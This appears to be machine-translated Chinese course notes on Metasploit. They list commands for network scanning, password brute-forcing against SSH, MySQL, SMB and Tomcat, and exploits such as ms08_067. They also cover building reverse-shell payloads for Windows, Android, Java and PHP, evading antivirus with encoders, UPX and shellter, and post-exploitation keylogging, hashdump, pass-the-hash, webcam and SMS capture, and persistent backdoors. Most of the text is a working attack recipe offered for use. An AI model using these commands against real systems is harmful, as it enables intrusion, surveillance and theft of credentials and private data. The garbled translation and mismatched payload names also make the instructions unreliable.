Means that the buffer overflow is provided a data storage capacity of more than a buffer, as poured into the cup as an excess of water.
May be understood more abstractly buffer memory area as read-write period,
the ultimate goal of the attack is desired buffer system to perform this read-write memory has been deliberately set of malicious code.
String manipulation functions using secure
write security code
input data validation (filtering)
pointer integrity checking
party software defense
Penetration attacks (exploit)
testers use loopholes in the system, program, or service attack of a process
Attack load (payload)
section attacker attacker's code is executed on the target system, change the code having a rebound connection, create a user, to perform the functions of other system commands
shellcode
period of machine instructions that run on the target machine, will return after successful execution of a shell
Module (Module1)
refers to a piece of software code components used in frame metasploit
Listener (listener)
listener is to wait for the assembly metasploit access network connection
Open the database service postgresql statr
Check database state service postgresql status
Run msfconsole
View the database connection status db_connect
Create a table workspace -a test
Delete table workspace - d test
Enter the test bench Wordspace test
Use nmap db_nmap -sS 192.168.80.1 scan host
Export scan results db_export 1.xml
import scan results db_import 1.xml
View scan results hosts
collect message
Open msfconsole
- whois www.example.com
- nslookup
use auxiliary / scanner / ip / ipidseq #IPID sequence scanner, and -sI nmap -O option is similar to the
Show Options
the SET rhosts 192.168.1.0/24
the SET RPORT 8080
the SET THREADS 50
RUN
nmap scanning the database connection
db_nmap -sS -A 192.168.2.123
db_services view scan results
使用portscan模块
search postscan
use auxiliary/scanner/postscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run
Smb_version specific scanning module:
use Auxiliary / Scanner / smb / smb_version find open port 445 ip
Show Options
the SET rhosts 192.168.1.111
the SET THREADS 50
RUN
db_hosts -c address, os_flavor
找mssql主机
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
E-mail address search site
search_email_collector
use Auxiliary / Gather / search_email_collector
the SET DOMAIN cracer.com (scanning domain)
RUN
ssh scan server
use Auxiliary / Scanner / ssh / ssh_version
SET rhosts 192.168.1.0/24
SET THREADS 50
RUN
telnet服务
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
ftp host scans
use Auxiliary / Scanner / ftp / ftp_version
Show Options
the SET rhosts 192.168.1.0/24
the SET THREADS 50
RUN
Sweep anonymous ftp login
use Auxiliary / Scanner / ftp / anonymos
Show Options
the SET rhosts 192.168.1.0/24
the SET THREADS 50
RUN
anonymous ftp login
login name: anonymous
Password: empty
Scan the local area network which hosts survived
use Auxiliary / Scanner / Discovery / arp_sweep
Show Options
the SET rhosts 192.168.1.0/24
the SET THREADS 50
RUN
Scan web directory (and does not scan files)
use Auxiliary / Scanner / HTTP / dir_scanner
Show Options
the SET rhosts 192.168.1.129
the SET THREADS 50
RUN
扫描SNMP主机
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Ethereal sniffer
use Auxiliary / Sniffer / psnuffle
RUN
Password blast
ssh密码
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit
telnet密码
search telnet_login
use auxiliray/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set FILE_PATH pass
set USERNAME administrator
exploit
samba攻击
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit
mysql密码爆破
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit
search postgresql_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit
tomcat攻击
search tomcat_mgr_login
show options
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit
Exploit module
show targets displayed target (os version)
Set Target version set TARGET
began to exploit the vulnerability to attack
session -l lists the session
Select Session session -i
session -k session ends
The conversation in the background z
c session ends
show auxiliary display auxiliary module
use auxiliary module
set setup options
run run module
ms10_002
Search ms10_002
use exploit / Windows / Browser / ms10_002_aurora
Show Options
the SET SRVHOST 192.168.2.128 (malicious URL generation IP (can proxy))
the SET payload Windows / Meterpreter / reverse_tcp (bounce shell)
the SET SRVPORT 80 (bounce back to port)
the SET uripath /
SET lhost 192.168.2.128 (listening for address)
SET LPORT 1211 (for the listening port)
exploit
sessions -i (see if there is a session)
sessions -i 1 (selecting an ID, the session enters)
directly enter the shell can be obtained shell
ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit
sessions -i (see if there is a session)
sessions -i 1 (selecting an ID, into the session)
Because different payload, so this directly into the shell
ms12_020
Search ms12_020
use Auxiliary / Scanner / RDB / ms12_020_check (check for ms12_020 vulnerability)
Show Options
the SET rhosts 192.168.2.0/24
the SET THREADS 50
back
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run
ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRBHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit
ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show target
set target 34
exploit
shellcode
windows
生成shellcode
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe
监听shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
linux
生成shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer
监听shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
andriod
生成shellcode
msfpayload android/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk
监听shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
dump_contacts 导出电话
dump_sms 导出信息
Webcam_list 摄像头数目
-i 1 后置摄像头
webcam_snap 拍照
webcam_stream 开启摄像头
java
生成shellcode
msfpayload java/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar
监听shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1125
将生成得shellcode上传到目标机上
exploit
将生成得cracer.jar运行起来:
Java -jar cracer.jar运行起来
php
成shellcode
msfpayload php/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 R > cracer.php
监听shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
shell free to kill to avoid killing
Using multiple编码Men杀
msfpayload windows / meterpreter / reverse_tcp LHOST 192.168.2.133 LPORT = 1211 R | msfencode -e x86 / shikata_ga_nai -c 5 -t raw | msfencode -e x86 / alpha_upper -c 2 -t raw | msfencode -e x86 / shikata_ga_nai -c 5 -t raw | msfencode -e x86 / countdown -c 5 -t exe -o /root/cc.exe
Packers free to kill
upx -5 cc.exe
veil free to kill
shellter free to kill tool
shellcode of injection tool
in some normal tools have injected a few holes, to achieve free to kill
- First, to generate the Metasploit payload
msfvenom -p Windows / Meterpreter / reverse_tcp lhost 1337 = -e = 192.168.1.3 LPORT the x86 / 43 is shikata_ga_nai -i -f -o RAW fud.raw - Perform wine shellter.exe run our shellter with red wine bottles,
- Where A represents the automatic mode, PE target that we are ready to carry out pre-injection to avoid killing exe file location
- Here we select the command to start the load input L, here we use meterpreter_reverse_tcp load, input 1
- Enter the location of our rally shell, and then type the local port we need to listen, and here I chose 1355 as the listening port, enter directly generate
- 启动Metasploit监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1355
exploit - After starting to listen, to generate a file directory was placed on the main line to run under windows computer
After penetration
1. Create a trojan
msfpaylaod Windows / Meterpreter / reverse_tcp lhost 192.168.2.133 LPORT = X-1121> /root/cracer.exe
2. listening
use exploit / Multi / Handler
SET payload Windows / Meterpreter / reverse_tcp
SET lhost 192.168.2.133
SET LPORT 1233
exploit
Trojan on the target machine execution
- Operation Command
You will have to generate screen capture screenshot picture into the main folder
Acquisition system run sysinfo platform
Get keyloggers
keyscan_start start
keyscan_dump output
keyscan_stop end
ps check process
migrate 1774 handover process (a successful invasion was to target the first thing is to get the process of switching to a stable, so that even if the program is shut down, will be controlled)
run post / windows / capture / keylog_recorder record keylogger
Get hash ---- hashdump
Log in using the hash
use exploit / Windwows / smb / PsExec
the SET payload windwos / metpreter / reverse_tcp
the SET lhost 192.168.2.133
the SET rhost 192.168.2.131 (target)
Show Options
the SET LPORT 1212
the SET smbuser Administrator obtain the hash can get these values smbpass smbuser
the SET asdasdqwsda1313 smbpass
Show Options
exploit
Process migration run post / windows / manage / migrate ( to switch to self-stabilization process)
RUN killav close cmd.exe
view target all traffic run packetrecorder -i 1
extract information systems run scraper
Lasting control of a PC (boot from Kai)
RUN Persistence -X 50 -i -p 1121 -r 192.168.2.133 (the goal was to write some registry data)
msfcosole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
session -u 2 升级shell变成meterpreter
Permanent control server
msfpaylaod windows / meterpreter / reverse_tcp LHOST = 192.168.2.133 LPORT = 1127 X> /root/cracer.exe
generating payload on the destination machine to give
msfcosole
use exploit/multi/handler
set payload windows/meterpreter/metsvc_bin_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
Run payload
run metsvc -A // permanent installation backdoor
After the restart
msfcosole
use exploit / Multi / Handler
the SET payload Windows / metsvc_bind_tcp
the SET rhost 192.168.2.132
the SET LPORT 31337 // get fixed port
exploit